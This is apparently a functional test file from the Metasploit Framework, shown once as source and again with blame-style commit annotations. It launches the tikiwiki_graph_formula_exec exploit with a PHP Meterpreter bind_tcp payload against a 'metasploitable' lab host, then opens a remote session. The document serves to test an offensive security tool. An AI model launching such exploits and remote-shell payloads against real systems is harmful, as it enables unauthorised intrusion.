metasploit-framework/test/functional/meterpreter/meterpreter_php_spec.rb

$:.unshift(File.join(File.dirname(__FILE__)))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'test', 'lib'))

require 'fileutils'
require 'msf/base'
require 'meterpreter_spec_helper'
require 'meterpreter_specs'

module MsfTest

describe "PhpMeterpreter" do
  
  # This include brings in all the spec helper methods
  include MsfTest::MeterpreterSpecHelper
  
  # This include brings in all the specs that are generic across the 
  # meterpreter platforms
  include MsfTest::MeterpreterSpecs

  before :all do
    @verbose = true
  
    @meterpreter_type = "php"
    
    ## Set up an outupt directory
    @output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")

    if File.directory? @output_directory
      FileUtils.rm_rf(@output_directory)
    end

    Dir.mkdir(@output_directory)
    @default_file = "#{@output_directory}/default"

    create_session_php
  end

  before :each do

  end

  after :each do
    @session.init_ui(@input, @output)
  end
  
  after :all do
    FileUtils.rm_rf(@output_directory)
  end

  
  def create_session_php

    ## Setup for php
    @framework    = Msf::Simple::Framework.create
    
    @exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
    @payload_name = 'php/meterpreter/bind_tcp'
    @input        = Rex::Ui::Text::Input::Stdio.new 
    @output       = Rex::Ui::Text::Output::File.new(@default_file)

    # Initialize the exploit instance
    exploit = @framework.exploits.create(@exploit_name)

    ## Fire it off against a known-vulnerable host
    @session = exploit.exploit_simple(
      'Options'     => {'RHOST' => "metasploitable"},
      'Payload'     => @payload_name,
      'LocalInput'  => @input,
      'LocalOutput' => @output)

    puts @session.inspect

    ## If a session came back, try to interact with it.
    if @session
      @session.load_stdapi
    else
      raise Exception "Couldn't get a session!"
    end
  end
  
end
end
updated meterpreter functional tests git-svn-id: file:///home/svn/framework3/trunk@11909 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-09 03:04:12 +00:00			`$:.unshift(File.join(File.dirname(__FILE__)))`
add a php spec git-svn-id: file:///home/svn/framework3/trunk@11509 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-07 20:17:32 +00:00			`$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))`
			`$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'test', 'lib'))`

			`require 'fileutils'`
			`require 'msf/base'`
			`require 'meterpreter_spec_helper'`
			`require 'meterpreter_specs'`

			`module MsfTest`

			`describe "PhpMeterpreter" do`
Retab all the things (except external/) 2013-09-30 18:47:53 +00:00
			`# This include brings in all the spec helper methods`
			`include MsfTest::MeterpreterSpecHelper`

			`# This include brings in all the specs that are generic across the`
			`# meterpreter platforms`
			`include MsfTest::MeterpreterSpecs`

			`before :all do`
			`@verbose = true`

			`@meterpreter_type = "php"`

			`## Set up an outupt directory`
			`@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")`

			`if File.directory? @output_directory`
			`FileUtils.rm_rf(@output_directory)`
			`end`

			`Dir.mkdir(@output_directory)`
			`@default_file = "#{@output_directory}/default"`

			`create_session_php`
			`end`

			`before :each do`

			`end`

			`after :each do`
			`@session.init_ui(@input, @output)`
			`end`

			`after :all do`
			`FileUtils.rm_rf(@output_directory)`
			`end`


			`def create_session_php`

			`## Setup for php`
			`@framework = Msf::Simple::Framework.create`

			`@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'`
			`@payload_name = 'php/meterpreter/bind_tcp'`
			`@input = Rex::Ui::Text::Input::Stdio.new`
			`@output = Rex::Ui::Text::Output::File.new(@default_file)`

			`# Initialize the exploit instance`
			`exploit = @framework.exploits.create(@exploit_name)`

			`## Fire it off against a known-vulnerable host`
			`@session = exploit.exploit_simple(`
			`'Options' => {'RHOST' => "metasploitable"},`
			`'Payload' => @payload_name,`
			`'LocalInput' => @input,`
			`'LocalOutput' => @output)`

			`puts @session.inspect`

			`## If a session came back, try to interact with it.`
			`if @session`
			`@session.load_stdapi`
			`else`
			`raise Exception "Couldn't get a session!"`
			`end`
			`end`
add a php spec git-svn-id: file:///home/svn/framework3/trunk@11509 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-07 20:17:32 +00:00
			`end`
			`end`